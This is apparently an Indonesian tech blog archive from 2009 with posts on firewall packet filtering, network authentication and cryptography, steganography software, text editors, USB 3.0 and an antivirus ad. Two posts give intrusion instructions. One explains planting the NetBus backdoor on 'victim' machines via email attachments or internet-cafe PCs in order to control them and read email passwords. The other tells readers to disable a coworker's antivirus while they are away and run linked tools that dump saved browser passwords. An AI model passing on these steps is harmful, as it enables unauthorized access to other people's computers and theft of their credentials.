Dua arsitektur lainnya, screened-host dan screened-subnet, menyediakan pilihan lebih banyak. Screening-router dapat diatur untuk melakukan operasi packet filtering yang memungkinkan mesin-mesin tertentu dapat dikenali dari luar. Mesin mesin ini, kemudian menjalankan program-program server yang dapat diakses dari internet. Resiko dengan metoda seperti ini adalah penambahan jumlah komputer yang mungkin untuk diserang, sehingga akan lebih baik jika sebelumnya kita menyiapkan mesin-mesin tersebut dengan level security paling tidak sama dengan bastion-host atau kalau bisa, lebih.

Packet Filtering

Berbagai kebijakan dapat diterapkan dalam melakukan operasi packet filtering. Pada intinya, berupa mekanisme pengontrollan data yang diperbolehkan mengalir dari dan/atau ke jaringan internal, dengan menggunakan beberapa parameter yang tercantum dalam header paket data: arah (inbound atau outbound), address asal dan tujuan, port asal dan tujuan, serta jenis protokol transport. Router akan mengevaluasi informasi ini dalam setiap paket data yang mengalir melaluinya, kemudian menetapkan aksi yang harus dilakukan terhadap paket tersebut, berdasarkan set aturan/program dalam packet-filtering. Sehingga keputusan routing dasar router tersebut, kemudian dilengkapi dengan bagian dari kebijakan security jaringan.

Tabel berikut akan menunjukan contoh konfigurasi operasi packet-filtering, untuk menyediakan hanya fasilitas SMTP inbound dan outbound pada jaringan.

Aturan	Arah	Address Asal	Address Tujuan	Protokol	Port Tujuan	Aksi
A	masuk	eksternal	internal	TCP	25	ok
B	keluar	internal	eksternal	TCP	>1023	ok
C	keluar	internal	eksternal	TCP	25	ok
D	masuk	eksternal	internal	TCP	>1023	ok
E	sembarang	sembarang	sembarang	sembarang	sembarang	deny

Aturan A dan B melayani hubungan SMTP inbound (email datang), aturan C dan D melayani hubungan SMTP outbound (email keluar) serta aturan E merupakan aturan default yang dilakukan bila aturan aturan sebelumnya gagal. Kalau diamati lebih dekat, selain trafik SMTP konfigurasi tersebut juga masih membolehkan hubungan masuk dan keluar pada port >1023 (aturan B dan D), sehingga terdapat kemungkinan bagi program-program server seperti X11 (port 6000), OpenWindows (port 2000), atau kebanyakan program basis-data (Sybase, Oracle, Informix, dll), untuk dihubungi dari luar. Untuk menutup kemungkinan ini, diperlukan evaluasi parameter lain, seperti evaluasi port asal. Dengan cara ini, satu-satunya celah menembus firewall adalah dengan menggunakan port SMTP. Bila kita masih juga kurang yakin dengan kejujuran para pengguna port ini, dapat dilakukan evaluasi lebih lanjut dari informasi ACK.

Proxy

Dalam jaringan yang menerapkan sistem proxy, hubungan komunikasi ke internet dilakukan melalui sistem pendelegasian. Komputer-komputer yang dapat dikenali oleh internet bertindak sebagai ‘wakil’ bagi mesin lain yang ingin berhubungan ke luar. Proxy server untuk (kumpulan) protokol tertentu dijalankan pada dual-homed host atau bastion-host, dimana seluruh pemakai jaringan dapat berkomunikasi dengannya, kemudian proxy server ini bertindak sebagai delegasi. Dengan kata lain setiap program client akan berhubungan dengan proxy server dan proxy server ini lah yang akan berhubungan dengan server sebenarnya di internet. Proxy server akan mengevaluasi setiap permintaan hubungan dari client dan memutuskan mana yang diperbolehkan dan mana yang tidak. Bila permintaan hubungan ini disetujui, maka proxy server me-relay permintaan tersebut pada server sebenarnya.

Ada beberapa istilah menunjuk pada tipe proxy server, diantaranya proxy level aplikasi, proxy level circuit, proxy generik atau khusus, proxy cerdas dll. Apapun jenis proxy yang digunakan, ada beberapa konsekuensi implementasi sistem ini:

pada umumnya memerlukan modifikasi client dan/atau prosedur akses serta menuntut penyediaan program server berbeda untuk setiap aplikasi.
Penggunaan sistem proxy memungkinkan penggunaan private IP Address bagi jaringan internal. Konsekuensinya kita bisa memilih untuk menggunakan IP Address kelas A (10.x.x.x) untuk private IP address yang digunakan dalam jaringan internet; sehingga komputer yang dapat tersambung dalam jaringan internal dapat mencapai jumlah jutaan komputer.
Paket SOCKS atau TIS FWTK merupakan contoh paket perangkat lunak proxy yang sering digunakan dan tersedia bebas di internet.

Menyembunyikan Data Dengan Invisible Secret

2009-07-17T23:59:00.000-07:00

Invisible Secret

Apakah ada orang lain yang juga biasa menggunakan komputer Anda? Atau apakah Anda mempunyai data penting yang ingin Anda jaga kerahasiaannya? Jika ya, tentunya Anda harus mengamankan data tersebut. Beragam cara yang dapat digunakan untuk mengamankan data, misalnya dengan memproteksi folder, memberi password pada folder, enkripsi, dan lain-lain.

Invisible Secret menawarkan pengamanan data dengan cara yang agak berbeda, yaitu dengan mengenkripsi dan menyembunyikan file ke dalam sebuah file image. Gambarannya seperti ini, misalnya Anda mempunyai file image (dapat berupa file jpg atau bmp) maka Anda dapat menyembunyikan data ms word, excel, zip dan tipe data lainnya ke dalam file image tersebut.

Setelah disisipi dengan berbagai data bukan berarti file image tersebut akan rusak, tapi masih dapat dilihat secara normal.

Untuk menyembunyikan data dengan menggunakan Invisible Secret caranya adalah sebagai berikut:

Jalankan software Invisible Secret.
Klik tombol Next.
Pilih pada pilihan “Encrypt and/or Hide file(s) in a carrier file”, tekan tombol Next.
Pilih file image jpg atau bmp yang akan digunakan untuk menyembunyikan data, klik tombol Next.
Pilih file image
Pada langkah ini Anda harus memasukkan atau memilih file yang akan disembuyikan. Klik tombol Add File. Anda dapat menyembunyikan beberapa file sekaligus. Setelah Anda selesai memilih file, klik tombol Next.
Pilh file yang akan disembunyikan
Masukkan password yang akan digunakan untuk mengenkripsi data, tekan tombol Next.
Masukkan password
Pilih folder dan nama file image yang baru, tekan tombol Next.
Pilih folder dan nama file
Selesai

Untuk mengekstrak atau membuka kembali data yang telah disembunyikan caranya adalah sebagai berikut:

Jalankan software Invisible Secret.
Klik tombol Next.
Pilih pada pilihan “Extract and/or Decrypt file(s) in a carrier file”, tekan tombol Next.
Pilih file image yang berisi data yang akan diekstrak, tekan tombol Next.
Masukkan password, tekan tombol Next.
Pilih folder tujuan yang akan digunakan untuk mengekstrak file yang tersembunyi pada file image tersebut, klik tombol Next.
Pilih folder untuk mengekstrak file
Selesai

Anda bisa mendownload Invisible Secret di invsecr2.exe

Mempercayai Password: Network Authentication

2009-07-17T23:55:00.000-07:00

Hello there! If you are new here, you might want to subscribe to the RSS feed for updates on this topic.

Aspek security jaringan berkaitan erat dengan servis yang disediakan: inbound atau outbound. Security pada servis outbound dapat diupayakan sebaik mungkin dengan konfigurasi firewall. Demikian pula dengan akses anonymous servis inbound, seperti anonymous FTP, HTTP, Gopher dll. Dalam hal ini, informasi sengaja disediakan bagi semua orang. Lain halnya bila kita ingin menyediakan akses non-anonymous (atau authenticated services), dimana selain melalui firewall, seseorang yang meminta akses juga harus mendapat ‘ijin’ server setelah terlebih dahulu membuktikan identitasnya. Inilah authentication. Untuk selanjutnya, penulis menggunakan istilah autentisasi sebagai sinonim kata tersebut.

RESIKO-SECURITY SERVIS INBOUND
Mengapa perlu autentisasi…..? Internet adalah jaringan publik, dan terbuka bagi setiap orang diseluruh penjuru dunia untuk menggabungkan diri. Begitu besarnya jaringan ini, telah menimbulkan keuntungan serta kerugian. Sering kita dengar dan baca tentang bobolnya sistem komputer keuangan bank, informasi rahasia Pentagon atau basis data transkrip akademik mahasiswa. Kalimat tersebut cukup untuk mewakili pernyataan bahwa kita harus ‘waspada’ terhadap orang-orang ‘jahat’ dan senantiasa berusaha memperkecil kemungkinan bagi mereka untuk dapat melakukan niat jahatnya. Memang mudah untuk meniadakan kemungkinan penyusupan (akses ilegal) dari luar dengan menutup semua kanal trafik servis inbound ke jaringan internal. Namun ini berarti telah mereduksi keuntungan utama adanya jaringan: komunikasi dan pemakaian sumber daya bersama (sharing resources). Jadi, konsekuensi alami dengan jaringan cukup besar, adalah menerima dan berusaha untuk memperkecil resiko ini, bukan meniadakannya.

Kita akan mulai dari seorang network-administrator (NA) yang telah melakukan tugasnya dengan baik, dalam menyiapkan ‘pertahanan’ bagi semua servis outbound dan anonymous-inbound. Perlu beberapa hal tambahan lagi yang sebaiknya diingat. Apakah pertahanan tersebut sudah cukup kuat bagi terjadinya pencurian hubungan (hijacking attack)? Apakah didalamnya sudah dipertimbangkan kemungkinan pemonitoran ilegal paket-paket informasi yang dikirimkan (packet sniffing - playback attack)? Atau apakah sudah termasuk kesiapan bagi benar-benar adanya akses ilegal didalam sistem (false authentication)?

Hijacking biasanya terjadi pada komputer yang menghubungi jaringan kita, walaupun untuk beberapa kasus langka, bisa terjadi pada sembarang jalur yang dilaluinya. Sehingga akan bijaksana bila seorang NA mempertimbangkan pemberian kepercayaan akses, hanya dari komputer yang paling tidak mempunyai sistem security sama atau mungkin lebih ‘kuat’, dibandingkan dengan jaringan dibawah tanggung-jawabnya. Usaha memperkecil peluang musibah ini, juga dapat dilakukan dengan mengatur packet-filter dengan baik atau menggunakan server modifikasi. Misalnya, kita dapat menyediakan fasilitas anonymous-FTP bagi sembarang komputer dimanapun, tapi authenticated-FTP hanya diberikan pada host-host yang tercantum pada daftar ‘kepercayaan’. Hijacking ditengah jalur dapat dihindari dengan penggunaan enkripsi antar jaringan (end to end encryption).

Kerahasiaan data dan password juga merupakan topik disain security. Program yang didedikasikan untuk packet-sniffing dapat secara otomatis menampilkan isi setiap paket data antara client dengan servernya. Proteksi password dari kejahatan demikian dapat dilakukan dengan implementasi password sekali pakai (non-reusable password), sehingga walaupun dapat termonitor oleh sniffer, password tersebut tidak dapat digunakan lagi.

Resiko hijacking dan sniffing data (bukan password) tidak dapat dihindari sama sekali. Artinya NA harus mempertimbangkan kemungkinan ini dan melakukan optimasi bagi semakin kecil-nya kesempatan tersebut. Pembatasan jumlah account dengan akses penuh serta waktu akses jarak jauh, merupakan salah satu bentuk optimasi.

MEKANISME AUTENTISASI
Subyek autentisasi adalah pembuktian. Yang dibuktikan meliputi tiga kategori, yaitu: sesuatu pada diri kita (something you are SYA), sesuatu yang kita ketahui (something you know SYK), dan sesuatu yang kita punyai (something you have SYH). SYA berkaitan erat dengan bidang biometrik, seperti pemeriksaan sidik-jari, pemeriksaan retina mata, analisis suara dll. SYK identik dengan password. Sedangkan bagi SYH umumnya digunakan kartu identitas seperti smartcard. \

Barangkali, yang sekarang masih banyak digunakan adalah sistem ber-password. Untuk menghindari pencurian password dan pemakaian sistem secara ilegal, akan bijaksana bila jaringan kita dilengkapi sistem password sekali pakai. Bagaimana caranya penerapan metoda ini?

Pertama, menggunakan sistem perangko-waktu ter-enkripsi. Dengan cara ini, password baru dikirimkan setelah terlebih dulu dimodifikasi berdasarkan waktu saat itu. Kedua, menggunakan sistem challenge-response (CR), dimana password yang kita berikan tergantung challenge dari server. Kasarnya kita menyiapkan suatu daftar jawaban (response) berbeda bagi ‘pertanyaan’ (challenge) yang berbeda oleh server. Karena tentu sulit sekali untuk menghafal sekian puluh atau sekian ratus password, akan lebih mudah jika yang dihafal adalah aturan untuk mengubah challenge yang diberikan menjadi response (jadi tidak random). Misalnya aturan kita adalah: “kapitalkan huruf kelima dan hapus huruf keempat”, maka password yang kita berikan adalah MxyPtlk1W2 untuk challenge sistem Mxyzptlk1W2.

Kalau pada sistem CR, harus diketahui ‘aturan’-nya, maka pada sistem perangko-waktu, kita mesti mengingat password bagi pemberian perangko-waktu ini. Apakah cara seperti ini tidak mempersulit? Beruntung sekali mekanisme tersebut umumnya ditangani oleh suatu perangkat, baik perangkat lunak ataupun dengan perangkat keras. Kerberos, perangkat lunak autentisasi yang dibuat di MIT dan mengadopsi sistem perangko-waktu, mewajibkan modifikasi client bagi sinkronisasi waktu dengan server serta pemberian password perangko-waktu. Modifikasi program client mengingatkan kita pada proxy dan memang, kurang lebih seperti itu. Sistem CR biasanya diterapkan sekaligus dengan dukungan perangkat keras. Contoh sistem CR operasional adalah perangkat SNK-004 card (Digital Pathways) yang dapat diterapkan bersama-sama dengan paket TIS-FWTK (Trusted Information System - internet FireWall ToolKit).

TIS-FWTK menawarkan solusi password sekali pakai (sistem CR) yang ‘menyenangkan’: S/Key. S/Key menerapkan prosedur algoritma hash iteratif terhadap suatu seed, sedemikian sistem dapat memvalidasi response-client instant tapi tidak mempunyai kemampuan untuk memprediksi response-client berikutnya. Sehingga bila terjadi penyusupan pada sistem, tidak ada ’sesuatu’ yang bisa dicuri (biasanya daftar password). Algoritma hash mempunyai dua sifat utama. Pertama, masukan tidak bisa diregenerasikan dari keluaran (non-reversibel). Kedua, terdapat dua kemungkinan masukan bagi sebuah keluaran yang sama.

ENKRIPSI DAN CRYPTOGRAPHY
Cryptography telah berkembang sejak lama, ketika orang menginginkan informasi yang ia kirimkan tidak dapat ‘dibaca’ oleh pihak tak berkepentingan. Secara tradisional cryptography dikenal dengan dua mekanisme, kunci privat atau kunci publik. DES (data encryption standard) yang digunakan oleh Kerberos menggunakan sistem kunci-privat. RSA (Rivest Shamir Addleman) mengimplementasikan sistem kunci-publik. Salah satu dari kontributor RSA, Ron Rivest kemudian membuat MD4 (message digest function # 4) yang digunakan oleh S/Key-nya TIS-FWTK. Optimasi dan blasteran antara kedua metoda tradisional ini melahirkan PGP (Pretty Good Privacy). Pembahasan dari DES, RSA, atau PGP merupakan buku tersendiri dan tidak pada tempatnya diungkapkan disini. Tapi yang jelas, sistem kunci-privat dicirikan dengan proses encrypt-decrypt melalui kunci identik, sedangkan pada sistem kunci-publik, proses ini dilakukan dengan dua buah kunci: kunci publik untuk encrypt dan kunci rahasia untuk decrypt dimana kedua kunci ini digenerasikan dan mempunyai relasi dekat melalui sebuah algoritma matematis. Karena diperlukan proses matematis terlebih dulu, kecepatan sistem kunci-publik bisa ribuan kali lebih lambat dari algoritma kunci-privat ekivalen walaupun disisi lain menawarkan proteksi lebih baik. Eksploitasi terhadap kelebihan dan kekurangan sistem kunci privat dan publik dilakukan PGP, dimana untuk transmisi data dilakukan secara sistem kunci-privat dengan session-key sehingga berjalan cepat, sedangkan transmisi session-key- nya sendiri menggunakan kunci-publik.

Dengan enkripsi, informasi yang kita kirimkan ke suatu jaringan melalui jaringan lain yang keamanannya meragukan (internet), relatif lebih terjamin. Enkripsi antar jaringan menyebabkan seorang ‘pencuri’ harus berusaha sedikit lebih keras untuk mendapatkan informasi ilegal yang ia harapkan. Ada beberapa kesempatan bagi implementasi enkripsi, yaitu: pada level aplikasi, level data-link, dan level jaringan.
Enkripsi pada level aplikasi mensyaratkan penggunaan perangkat lunak client-server khusus. Sesuai dengan model referensi OSI, enkripsi data-link hanya berlaku untuk hubungan titik ke titik, seperti sistem enkripsi pada modem telepon. Sedangkan enkripsi level jaringan (network layer) diterapkan pada router atau peralatan lain yang bersebelahan dengan jaringan dikedua sisi. Optimasi kepentingan dan kebijakan security dilakukan dengan mengatur jenis/bagian paket IP yang akan dienkrip, penyesuaian terhadap arsitektur firewall dan konsekuensinya, efektifitas distribusi kunci-enkripsi dll. Di masa depan, dimana teknologi VLAN (Virtual LAN) diperkirakan menjadi pilihan utama untuk Intranet (enterprisewide), penggunaan enkripsi level jaringan ini menjadi begitu penting. Barangkali sama pentingnya dengan keadaan sebuah perusahaan yang sementara ini ‘terpaksa’ menggunakan internet sebagai jalur bagi pengiriman informasi sensitif antara kantor pusat dengan cabangnya dibelahan bumi yang lain.

KERBEROS DAN TIS-FWTK AUTHENTICATION SERVER
Kerberos adalah salah satu karya proyek Athena, kolaborasi antara MIT, IBM dan DEC. Kerberos didisain untuk medukung autentisasi dan enkripsi data pada lingkungan terdistribusi melalui modifikasi client atau server standard. Beberapa vendor sistem operasi telah memasukan Kerberos kedalam produknya. MIT sendiri menyediakan secara free banyak versi Unix yang telah di-Kerberizing. Bahkan bagi kepentingan porting ke sistem operasi atau perangkat lunak client-server yang belum mendukung Kerberos, MIT menyediakan source-code nya, juga secara free. Proyek Athena sendiri mengimplementasikan Kerberos pada banyak aplikasi seperti NFS, rlogin, email, dan sistem password. Secure RPC (Sun Microsystems) juga mengimplementasikan hal yang sama.

Ada beberapa hal yang perlu dipertimbangkan dalam implementasi Kerberos. Modifikasi perangkat lunak client dan server akan menyebabkan pembatasan pilihan aplikasi. Sayangnya juga tidak ada metoda alternatif sebagai pengganti modifikasi source-code (seperti dalam proxy yang membolehkan custom user procedure atau custom client software). Kemudian, umumnya orang juga sepakat untuk menyebut: “Kerberos relatif sulit diterapkan/ dikelola”.

Paket sistem autentisasi lain ditawarkan oleh TIS-FWTK: authentication-server. Server ini didisain secara modular, fleksibel sehingga mendukung banyak mekanisme autentisasi populer seperti sistem password reusable standard, S/Key, card SecurdID dari Security Dynamics (sistem dengan perangko-waktu), card SNK-004 Digital Pathways (sistem CR) serta kemudahan untuk pengintegrasian mekanisme baru. Kembali kepada perbincangan diawal tulisan ini, kalau kepentingan utama kita adalah bagaimana menyiapkan ‘pertahanan’ bagi servis inbound non-anonymous, barangkali authentication-server adalah solusi yang patut dipertimbangkan. Mengapa? Bagaimana sistem ini bekerja? Tidak banyak ruang dalam tulisan ini untuk memuat semua diskusi kita tentang autentisasi, tapi ilustrasi penutup berikut akan memberikan sedikit gambaran bagi anda, peminat security jaringan, menyangkut authentication-server.

Menjahili Orang Lain Dengan Netbus

2009-07-16T01:48:00.000-07:00

Ditulis Oleh Lutfi pada tanggal 23 July, 2001. Dibaca 9,085 kali.

NetBus merupakan backdoor yang berjalan di sistem operasi Windows 9x dan NT. Dengan Netbus tersebut banyak hal menyenangkan yang bisa Anda lakukan, diantaranya adalah:

* Membuka dan menutup CD-ROM Drive.
* Melakukan shut down, log off, reboot dan power off.
* Mengontrol gerakan mouse dan keyboard.
* Menutup program.
* Mengirimkan pesan atau text.
* Memata-matai komputer “korban”.
* Mengarahkan komputer “korban” sehingga membuka URL tertentu.

Untuk menjalankan NetBus dibutuhkan 2 buah file, yaitu NetBus.exe dan Patch.exe (tapi nama file tersebut bisa saja diganti dengan nama yang lain). NetBus.exe merupakan file yang diletakkan di komputer kita, sedangkan Patch.exe diletakkan di komputer “korban”.

Ada beberapa cara untuk “menanam” file Patch.exe di komputer “korban”. Misalnya dengan mengirimkan sebagai attachment saat Anda mengirim email. Jika penerima email tersebut mengeksekusi file Patch.exe maka file tersebut akan ter-copy ke directory Windows ( pada komputer “korban”). Cara lain adalah (ini yang lebih asyik) letakkan file tersebut di semua komputer pada suatu warnet.

Jika berhasil Anda tinggal jalankan file NetBus.exe. Pada kolom Host name/IP Address isi dengan host name/ip address pada komputer si “korban”. Kalau Anda bingung, gunakan fasilitas Scan yang akan memeriksa komputer mana saja yang telah terdapat file Patch.exe. Selesai mengisi ip address klik tombol Connect. Tunggu beberapa saat. Jika koneksi berhasil tombol Connect akan berganti menjadi tombol Cancel dan setelah itu Anda bisa melakukan apa yang Anda sukai, termasuk menyadap password email orang lain.

Untuk mendapatkan NetBus Anda bisa mendownloadnya dari HackersClub.

Peringatan:
Gunakan artikel ini untuk menambah pengetahuan Anda. Jangan melakukan hal-hal yang dapat merugikan orang lain.

5 Text Editor Pilihan Pengganti Notepad

2009-07-16T01:41:00.000-07:00

Notepad merupakan text editor bawaan Windows yang sejak pertama kali muncul sampai sekarang hampir tidak ada tambahan fitur. Notepad ini hanya cocok digunakan untuk menulis catatan “ringan” atau teks yang sederhana.

Jika Anda membutuhkan sebuah text editor dengan kemampuan lebih seperti syntax highlighting, multi document, search and replace, dll maka silakan Anda pilih 5 notepad replacement di bawah ini.

1. Notepad ++

Notepad++ merupakan text editor dan source code editor gratis yang mempunyai fitur yang cukup banyak. Freeware ini cocok buat Anda yang membutuhkan text editor dengan kemampuan yang lebih.

Fitur:

Syntax Highlighting and Syntax Folding
WYSIWYG
User Defined Syntax Highlighting
Auto-completion
Multi-Document
Multi-View
Regular Expression Search/Replace supported
Full Drag ‘N’ Drop supported
Dynamic position of Views
File Status Auto-detection
Zoom in and zoom out
Multi-Language environment supported
Bookmark
Brace and Indent guideline Highlighting
Macro recording and playback

2. PSPad

PSPad merupakan text editor untuk keperluan pemrograman. Saat ini PSPad support untuk bahasa pemrograman C++, Cobol, MS-Dos batch, CSS, Forth, Fortran, FoxPro, HTML, XHTML, INI, Inno Setup, Java, JavaScript, KixStart, Object Pascal, Perl, PHP, Python, RSS, SQL, TCL/TK, Unix ShellScript, VBScript, Visual Basic, X86 assembler dan lebih dari 120 bahasa lainnya.

3. NoteTab Light

NoteTab Light mempunyai fitur sebagai berikut:

Easy to use, reliable, fast, and very flexible.
Open, navigate and edit many documents at once, even huge files.
AutoCorrect/Auto-replace mode, thesaurus, and spell checking with 13 language dictionaries available.
Formatting and conversion commands galore: text case, alignment, strip tags, convert to HTML, unquote e-mails, and much more. Can automatically capture and save text sent to the Clipboard from any application.
Supports many file formats: DOS, MAC, UNIX, ANSI, ASCII, UNICODE, and EBCDIC.
Calculates the results of mathematical expressions and inserts them in your text.
Includes regular expression’s engine based on PCRE (Perl 5 compatible) for wildcard searches and replacements.
Powerful Clipbook tool makes it easy to access handy macro functions and boilerplate text.
Programmable – add your own custom commands using an easy-to-learn, full-featured script language.

4. Notepad2

Notepad2 merupakan text editor yang cukup kecil dan ringan dengan fitur syntax highlighting. Software ini dapat langsung Anda jalankan tanpa harus diinstall terlebih dahulu.

5. EditPad Lite

EditPad Lite merupakan text editor dengan banyak kelebihan dibanding Notepad, dapat dijalankan pada sistem operasi Windows NT4, 98, 2000, ME, XP and Vista.

Tool kecil pembobol password Email, FS dsb

2009-07-07T02:46:00.000-07:00

prepiunya
http://img81.imageshack.us/img81/4499/po...http://img81.imageshack.us/img81/4499/post27012122434624

Lagi-lagi ane sharing buat bro n sis...
Ade dua tool kecil yang gedenye cuma 40KB tapi khasiatnya muantaaaaaaab...dan tanpa perlu di instal, langsung di jalanin..
Ane contohin, misalnye ente pengen tau password email, fs dsb dari temen kerja ente yang ada di samping ente.
Caranye, ente tunggu die cabut dari kursinye. Pas die ninggalin tuh kursinye, ente jalanin aje tuh tool via Flashdisk atau floppy.
Tapi sebelumnye ente disable dulu anti virus di tuh kompi, soalnye kalo ga bakal ke ditek jadi trojan (yang jelas ni tool bukan virus).
Abis ntu.....dicoba jalanin deh.
Jreng----jreng!!!!....semua password yang beberapa menit lalu pernah dimasukin ame temen ente, bakal kebuka tanpa kecuali. Hebat kan?

Jadi intinye ni tool bakal nyedot semua password yang tersimpan di cookies dari kompi yang abis di pake wat ngenet. Gityu bro.

Untuk calon victim nyang pake Firefox, download
nih linknya: http://www.ziddu.com/download/2960500/pa...http://www.ziddu.com/download/2960500/passwordfo

Untuk calon victim nyang pake IE, downloadnye
http://www.ziddu.com/download/2960521/IE...http://www.ziddu.com/download/2960521/IE_PasswordViewe

buruan mumpung masih hidup link nya...:peace and vote my rating :

USB 3.0

2009-07-06T16:26:00.000-07:00

USB 3.0 baru saja disahkan sebagai standar koneksi USB terbaru. Ada rumor bahwa USB 3.0 akan digunakan untuk PC, paling lambat tahun ini sudah bisa diadopsi bagi computer desktop. Produsen PC Taiwan menjadi perusahaan pertama yang menambilkan teknologi USB 3.0.

Kecepatan USB 3.0 lebih menjanjikan, memiliki tranfer rate sampai 5 GBits/s. Sebagai catatan, USB 2.0 hanya memiliki kecepatan transfer Rate 480 Mbit/s (60 MB/s) ketika diperkenalkan pada tahun 2001. Jadi kecepatan USB 3.0 sekitar 10x lipat dibanding USB 2.0.

NEC mulai mengirim host controller chip untuk USB 3.0, dan akan berproduksi penuh pada bulan September.

Perbandingan USB 2.0 Dengan USB 3.0

Avg Internet Security - Proteksi Komplet A-Z

2009-07-06T16:23:00.000-07:00

AVG Internet Security v8.5.339

Anti-Virus, Anti-Spyware, Anti-Spam, LinkScanner & Firewall. Comprehensive protection for your computer! This award-winning product gives you unbeatable Internet security by protecting against viruses, spyware, hackers, spam and malicious websites.

AVG Internet Security is a reliable and easy-to-use solution for home and small office users which is trusted by millions of users worldwide. Unique Internet security thanks to new technology - Only AVG gives you real-time protection against malicious websites thanks to our new LinkScanner technology. Comprehensive protection for Windows against all online threats from the world's most trusted security company. Use the Internet with confidence in your home or small office.

• Easy to download, install and use
• Protection against all Internet threats
• Real-time security while you surf and chat online
• Top-quality protection that does not slow your system down
• Free support and service around the clock and across the globe
• Compatible with Windows Vista and Windows XP

FEATURES:

All-in-one protection
• Anti-Virus: protection against viruses, worms and trojans
• Anti-Spyware: protection against spyware, adware and identity-theft
• Anti-Rootkit: protection against hidden threats (rootkits)
• Anti-Spam: filters out unwanted and fraudulent e-mails (anti-phishing)
• Web Shield & LinkScanner: protection against malicious websites
• Firewall: protection against hackers
• System Tools: for easy system management

Easy-to-use, automated protection
Real-time protection, automatic updates, low-impact background scanning for online threats, and instant quarantining or removal of infected files ensures maximum protection. Every interaction between your computer and the Internet is monitored, so nothing can get onto your system without your knowledge. AVG scans in real time:
• All files including documents, pictures and applications
• E-mails (all major email programs like MS Outlook and Thunderbird supported)
• Instant messaging and P2P communications
• File downloads and online transactions such as shopping and banking
• Search results and any other links you click on

Download Di Sini